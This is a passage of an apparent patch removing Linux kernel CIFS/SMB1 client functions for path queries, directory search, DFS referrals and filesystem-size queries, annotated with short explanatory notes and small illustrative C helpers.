+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in UnixQPathInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
+-			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			memcpy((char *) pFindData,
+-			       (char *) &pSMBr->hdr.Protocol +
+-			       data_offset,
+-			       sizeof(FILE_UNIX_BASIC_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto UnixQPathInfoRetry;
+-
+-	return rc;
+-}
+-
+-/* xid, tcon, searchName and codepage are input parms, rest are returned */
+-int
+-CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const char *searchName, struct cifs_sb_info *cifs_sb,
+-	      __u16 *pnetfid, __u16 search_flags,
+-	      struct cifs_search_info *psrch_inf, bool msearch)
+-{
+-/* level 257 SMB_ */
+-	TRANSACTION2_FFIRST_REQ *pSMB = NULL;
+-	TRANSACTION2_FFIRST_RSP *pSMBr = NULL;
+-	T2_FFIRST_RSP_PARMS *parms;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int name_len, remap;
+-	__u16 params, byte_count;
+-	struct nls_table *nls_codepage;
+-
+-	cifs_dbg(FYI, "In FindFirst for %s\n", searchName);
+-
+-findFirstRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	nls_codepage = cifs_sb->local_nls;
+-	remap = cifs_remap(cifs_sb);
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
+-				       PATH_MAX, nls_codepage, remap);
+-		/* We cannot add the asterisk earlier in case
+-		it got remapped to 0xF03A as if it were part of the
+-		directory name instead of a wildcard */
+-		name_len *= 2;
+-		if (msearch) {
+-			pSMB->FileName[name_len] = CIFS_DIR_SEP(cifs_sb);
+-			pSMB->FileName[name_len+1] = 0;
+-			pSMB->FileName[name_len+2] = '*';
+-			pSMB->FileName[name_len+3] = 0;
+-			name_len += 4; /* now the trailing null */
+-			/* null terminate just in case */
+-			pSMB->FileName[name_len] = 0;
+-			pSMB->FileName[name_len+1] = 0;
+-			name_len += 2;
+-		}
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-		if (msearch) {
+-			if (WARN_ON_ONCE(name_len > PATH_MAX-2))
+-				name_len = PATH_MAX-2;
+-			/* overwrite nul byte */
+-			pSMB->FileName[name_len-1] = CIFS_DIR_SEP(cifs_sb);
+-			pSMB->FileName[name_len] = '*';
+-			pSMB->FileName[name_len+1] = 0;
+-			name_len += 2;
+-		}
+-	}
+-
+-	params = 12 + name_len /* includes null */ ;
+-	pSMB->TotalDataCount = 0;	/* no EAs */
+-	pSMB->MaxParameterCount = cpu_to_le16(10);
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(
+-	      offsetof(struct smb_com_transaction2_ffirst_req, SearchAttributes)
+-		- 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;	/* one byte, no need to make endian neutral */
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_FIRST);
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
+-			ATTR_DIRECTORY);
+-	pSMB->SearchCount = cpu_to_le16(CIFSMaxBufSize/sizeof(FILE_UNIX_INFO));
+-	pSMB->SearchFlags = cpu_to_le16(search_flags);
+-	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
+-
+-	/* BB what should we set StorageType to? Does it matter? BB */
+-	pSMB->SearchStorageType = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_ffirst);
+-
+-	if (rc) {/* BB add logic to retry regular search if Unix search
+-			rejected unexpectedly by server */
+-		/* BB Add code to handle unsupported level rc */
+-		cifs_dbg(FYI, "Error in FindFirst = %d\n", rc);
+-
+-		cifs_buf_release(pSMB);
+-
+-		/* BB eventually could optimize out free and realloc of buf */
+-		/*    for this case */
+-		if (rc == -EAGAIN)
+-			goto findFirstRetry;
+-	} else { /* decode response */
+-		/* BB remember to free buffer if error BB */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		if (rc == 0) {
+-			unsigned int lnoff;
+-
+-			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-				psrch_inf->unicode = true;
+-			else
+-				psrch_inf->unicode = false;
+-
+-			psrch_inf->ntwrk_buf_start = (char *)pSMBr;
+-			psrch_inf->smallBuf = false;
+-			psrch_inf->srch_entries_start =
+-				(char *) &pSMBr->hdr.Protocol +
+-					le16_to_cpu(pSMBr->t2.DataOffset);
+-			parms = (T2_FFIRST_RSP_PARMS *)((char *) &pSMBr->hdr.Protocol +
+-			       le16_to_cpu(pSMBr->t2.ParameterOffset));
+-
+-			if (parms->EndofSearch)
+-				psrch_inf->endOfSearch = true;
+-			else
+-				psrch_inf->endOfSearch = false;
+-
+-			psrch_inf->entries_in_buffer =
+-					le16_to_cpu(parms->SearchCount);
+-			psrch_inf->index_of_last_entry = 2 /* skip . and .. */ +
+-				psrch_inf->entries_in_buffer;
+-			lnoff = le16_to_cpu(parms->LastNameOffset);
+-			if (CIFSMaxBufSize < lnoff) {
+-				cifs_dbg(VFS, "ignoring corrupt resume name\n");
+-				psrch_inf->last_entry = NULL;
+-				return rc;
+-			}
+-
+-			psrch_inf->last_entry = psrch_inf->srch_entries_start +
+-							lnoff;
+-
+-			if (pnetfid)
+-				*pnetfid = parms->SearchHandle;
+-		} else {
+-			cifs_buf_release(pSMB);
+-		}
+-	}
+-
+-	return rc;
+-}
+-
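
As the comment in CIFSFindFirst() explains, the wildcard is appended only
after the charset conversion so that it cannot be remapped along with the
path. In the UTF-16LE case that means writing six more bytes: separator,
asterisk, and a double-null terminator. An illustrative helper
(append_wildcard_utf16le is hypothetical, not from the source):

/* name_len counts the bytes already converted; the caller guarantees at
 * least six bytes of headroom in the buffer */
static int append_wildcard_utf16le(char *name, int name_len, char dirsep)
{
	name[name_len]     = dirsep;	/* low byte of the separator */
	name[name_len + 1] = 0;		/* high byte */
	name[name_len + 2] = '*';	/* added post-conversion, never remapped */
	name[name_len + 3] = 0;
	name[name_len + 4] = 0;		/* UTF-16 double-null terminator */
	name[name_len + 5] = 0;
	return name_len + 6;
}
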
+-int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
+-		 __u16 searchHandle, __u16 search_flags,
+-		 struct cifs_search_info *psrch_inf)
+-{
+-	TRANSACTION2_FNEXT_REQ *pSMB = NULL;
+-	TRANSACTION2_FNEXT_RSP *pSMBr = NULL;
+-	T2_FNEXT_RSP_PARMS *parms;
+-	char *response_data;
+-	int rc = 0;
+-	int bytes_returned;
+-	unsigned int name_len;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In FindNext\n");
+-
+-	if (psrch_inf->endOfSearch)
+-		return -ENOENT;
+-
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 14; /* includes 2 bytes of null string, converted to LE below */
+-	byte_count = 0;
+-	pSMB->TotalDataCount = 0;       /* no EAs */
+-	pSMB->MaxParameterCount = cpu_to_le16(8);
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset =  cpu_to_le16(
+-	      offsetof(struct smb_com_transaction2_fnext_req,SearchHandle) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_NEXT);
+-	pSMB->SearchHandle = searchHandle;      /* always kept as le */
+-	pSMB->SearchCount =
+-		cpu_to_le16(CIFSMaxBufSize / sizeof(FILE_UNIX_INFO));
+-	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
+-	pSMB->ResumeKey = psrch_inf->resume_key;
+-	pSMB->SearchFlags = cpu_to_le16(search_flags);
+-
+-	name_len = psrch_inf->resume_name_len;
+-	params += name_len;
+-	if (name_len < PATH_MAX) {
+-		memcpy(pSMB->ResumeFileName, psrch_inf->presume_name, name_len);
+-		byte_count += name_len;
+-		/* 14 byte parm len above enough for 2 byte null terminator */
+-		pSMB->ResumeFileName[name_len] = 0;
+-		pSMB->ResumeFileName[name_len+1] = 0;
+-	} else {
+-		rc = -EINVAL;
+-		goto FNext2_err_exit;
+-	}
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_fnext);
+-	if (rc) {
+-		if (rc == -EBADF) {
+-			psrch_inf->endOfSearch = true;
+-			cifs_buf_release(pSMB);
+-			rc = 0; /* search probably was closed at end of search*/
+-		} else
+-			cifs_dbg(FYI, "FindNext returned = %d\n", rc);
+-	} else {                /* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc == 0) {
+-			unsigned int lnoff;
+-
+-			/* BB fixme add lock for file (srch_info) struct here */
+-			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-				psrch_inf->unicode = true;
+-			else
+-				psrch_inf->unicode = false;
+-			response_data = (char *) &pSMBr->hdr.Protocol +
+-			       le16_to_cpu(pSMBr->t2.ParameterOffset);
+-			parms = (T2_FNEXT_RSP_PARMS *)response_data;
+-			response_data = (char *)&pSMBr->hdr.Protocol +
+-				le16_to_cpu(pSMBr->t2.DataOffset);
+-			if (psrch_inf->smallBuf)
+-				cifs_small_buf_release(
+-					psrch_inf->ntwrk_buf_start);
+-			else
+-				cifs_buf_release(psrch_inf->ntwrk_buf_start);
+-			psrch_inf->srch_entries_start = response_data;
+-			psrch_inf->ntwrk_buf_start = (char *)pSMB;
+-			psrch_inf->smallBuf = false;
+-			if (parms->EndofSearch)
+-				psrch_inf->endOfSearch = true;
+-			else
+-				psrch_inf->endOfSearch = false;
+-			psrch_inf->entries_in_buffer =
+-						le16_to_cpu(parms->SearchCount);
+-			psrch_inf->index_of_last_entry +=
+-				psrch_inf->entries_in_buffer;
+-			lnoff = le16_to_cpu(parms->LastNameOffset);
+-			if (CIFSMaxBufSize < lnoff) {
+-				cifs_dbg(VFS, "ignoring corrupt resume name\n");
+-				psrch_inf->last_entry = NULL;
+-				return rc;
+-			} else
+-				psrch_inf->last_entry =
+-					psrch_inf->srch_entries_start + lnoff;
+-
+-/*  cifs_dbg(FYI, "fnxt2 entries in buf %d index_of_last %d\n",
+-    psrch_inf->entries_in_buffer, psrch_inf->index_of_last_entry); */
+-
+-			/* BB fixme add unlock here */
+-		}
+-
+-	}
+-
+-	/* BB On error, should we leave previous search buf (and count and
+-	last entry fields) intact or free the previous one? */
+-
+-	/* Note: on an -EAGAIN error only the caller can retry on handle based
+-	calls, since the file handle passed in is no longer valid */
+-FNext2_err_exit:
+-	if (rc != 0)
+-		cifs_buf_release(pSMB);
+-	return rc;
+-}
+-
+-int
+-CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const __u16 searchHandle)
+-{
+-	int rc = 0;
+-	FINDCLOSE_REQ *pSMB = NULL;
+-
+-	cifs_dbg(FYI, "In CIFSSMBFindClose\n");
+-	rc = small_smb_init(SMB_COM_FIND_CLOSE2, 1, tcon, (void **)&pSMB);
+-
+-	/* no sense returning error if session restarted
+-		as file handle has been closed */
+-	if (rc == -EAGAIN)
+-		return 0;
+-	if (rc)
+-		return rc;
+-
+-	pSMB->FileID = searchHandle;
+-	pSMB->ByteCount = 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(VFS, "Send error in FindClose = %d\n", rc);
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_fclose);
+-
+-	/* Since session is dead, search handle closed on server already */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const char *search_name, __u64 *inode_number,
+-		      const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc = 0;
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int name_len, bytes_returned;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In GetSrvInodeNum for %s\n", search_name);
+-	if (tcon == NULL)
+-		return -ENODEV;
+-
+-GetInodeNumberRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   search_name, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, search_name);
+-	}
+-
+-	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_INTERNAL_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "error %d in QueryInternalInfo\n", rc);
+-	} else {
+-		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			/* If rc, should we check for EOPNOTSUPP and
+-			disable the srvino flag? or in caller? */
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-			struct file_internal_info *pfinfo;
+-			/* BB Do we need a cast or hash here ? */
+-			if (count < 8) {
+-				cifs_dbg(FYI, "Invalid size ret in QryIntrnlInf\n");
+-				rc = -EIO;
+-				goto GetInodeNumOut;
+-			}
+-			pfinfo = (struct file_internal_info *)
+-				(data_offset + (char *) &pSMBr->hdr.Protocol);
+-			*inode_number = le64_to_cpu(pfinfo->UniqueId);
+-		}
+-	}
+-GetInodeNumOut:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto GetInodeNumberRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+-		const char *search_name, struct dfs_info3_param **target_nodes,
+-		unsigned int *num_of_nodes,
+-		const struct nls_table *nls_codepage, int remap)
+-{
+-/* TRANS2_GET_DFS_REFERRAL */
+-	TRANSACTION2_GET_DFS_REFER_REQ *pSMB = NULL;
+-	TRANSACTION2_GET_DFS_REFER_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-	*num_of_nodes = 0;
+-	*target_nodes = NULL;
+-
+-	cifs_dbg(FYI, "In GetDFSRefer the path %s\n", search_name);
+-	if (ses == NULL || ses->tcon_ipc == NULL)
+-		return -ENODEV;
+-
+-getDFSRetry:
+-	/*
+-	 * Use smb_init_no_reconnect() instead of smb_init() as
+-	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
+-	 * causing an infinite recursion.
+-	 */
+-	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
+-				   (void **)&pSMB, (void **)&pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	/* server pointer checked in called function,
+-	but should never be null here anyway */
+-	pSMB->hdr.Mid = get_next_mid(ses->server);
+-	pSMB->hdr.Tid = ses->tcon_ipc->tid;
+-	pSMB->hdr.Uid = ses->Suid;
+-	if (ses->capabilities & CAP_STATUS32)
+-		pSMB->hdr.Flags2 |= SMBFLG2_ERR_STATUS;
+-	if (ses->capabilities & CAP_DFS)
+-		pSMB->hdr.Flags2 |= SMBFLG2_DFS;
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		pSMB->hdr.Flags2 |= SMBFLG2_UNICODE;
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->RequestFileName,
+-				       search_name, PATH_MAX, nls_codepage,
+-				       remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {	/* BB improve the check for buffer overruns BB */
+-		name_len = copy_path_name(pSMB->RequestFileName, search_name);
+-	}
+-
+-	if (ses->server->sign)
+-		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	pSMB->hdr.Uid = ses->Suid;
+-
+-	params = 2 /* level */  + name_len /*includes null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->MaxParameterCount = 0;
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	  struct smb_com_transaction2_get_dfs_refer_req, MaxReferralLevel) - 4);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_GET_DFS_REFERRAL);
+-	byte_count = params + 3 /* pad */ ;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->MaxReferralLevel = cpu_to_le16(3);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in GetDFSRefer = %d\n", rc);
+-		goto GetDFSRefExit;
+-	}
+-	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-	/* BB Also check if enough total bytes returned? */
+-	if (rc || get_bcc(&pSMBr->hdr) < 17) {
+-		rc = -EIO;      /* bad smb */
+-		goto GetDFSRefExit;
+-	}
+-
+-	cifs_dbg(FYI, "Decoding GetDFSRefer response BCC: %d  Offset %d\n",
+-		 get_bcc(&pSMBr->hdr), le16_to_cpu(pSMBr->t2.DataOffset));
+-
+-	/* parse returned result into more usable form */
+-	rc = parse_dfs_referrals(&pSMBr->dfs_data,
+-				 le16_to_cpu(pSMBr->t2.DataCount),
+-				 num_of_nodes, target_nodes, nls_codepage,
+-				 remap, search_name,
+-				 (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE) != 0);
+-
+-GetDFSRefExit:
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto getDFSRetry;
+-
+-	return rc;
+-}
+-
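
The smb_init_no_reconnect() call above breaks a potential cycle: tree
reconnect may need a DFS referral, and the referral request must not itself
trigger a reconnect. The general shape of that pattern, with hypothetical
names:

#include <errno.h>

struct conn;
static int reconnect(struct conn *c);

static int send_request(struct conn *c, int may_reconnect)
{
	int session_dropped = 1;	/* placeholder for real detection */

	if (session_dropped) {
		if (!may_reconnect)
			return -EAGAIN;	/* let the outer caller retry */
		return reconnect(c);
	}
	return 0;
}

static int reconnect(struct conn *c)
{
	/* must pass may_reconnect = 0, or this would recurse forever */
	return send_request(c, 0);
}
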
+-/* Query File System Info such as free space to old servers such as Win 9x */
+-int
+-SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct kstatfs *FSData)
+-{
+-/* level 0x01 SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_ALLOC_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "OldQFSInfo\n");
+-oldQFSInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;     /* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_ALLOCATION);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
+-	} else {                /* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 18)
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			cifs_dbg(FYI, "qfsinf resp BCC: %d  Offset %d\n",
+-				 get_bcc(&pSMBr->hdr), data_offset);
+-
+-			response_data = (FILE_SYSTEM_ALLOC_INFO *)
+-				(((char *) &pSMBr->hdr.Protocol) + data_offset);
+-			FSData->f_bsize =
+-				le16_to_cpu(response_data->BytesPerSector) *
+-				le32_to_cpu(response_data->
+-					SectorsPerAllocationUnit);
+-			/*
+-			 * much prefer larger, but if the server doesn't
+-			 * report a valid size then 4K is a reasonable minimum
+-			 */
+-			if (FSData->f_bsize < 512)
+-				FSData->f_bsize = 4096;
+-
+-			FSData->f_blocks =
+-			       le32_to_cpu(response_data->TotalAllocationUnits);
+-			FSData->f_bfree = FSData->f_bavail =
+-				le32_to_cpu(response_data->FreeAllocationUnits);
+-			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
+-				 (unsigned long long)FSData->f_blocks,
+-				 (unsigned long long)FSData->f_bfree,
+-				 FSData->f_bsize);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto oldQFSInfoRetry;
+-
+-	return rc;
+-}
+-
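
A worked example of the f_bsize computation above: 512-byte sectors times 8
sectors per allocation unit gives 4096. Anything the server reports below
512 is treated as bogus and clamped to the 4K floor; the same logic in
isolation:

static unsigned long fs_block_size(unsigned int bytes_per_sector,
				   unsigned int sectors_per_alloc_unit)
{
	unsigned long bsize =
		(unsigned long)bytes_per_sector * sectors_per_alloc_unit;

	return bsize < 512 ? 4096 : bsize;	/* 4K floor on bogus reports */
}
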
+-int
+-CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct kstatfs *FSData)
+-{
+-/* level 0x103 SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSInfo\n");
+-QFSInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_SIZE_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 24)
+-			rc = -EIO;	/* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-
+-			response_data =
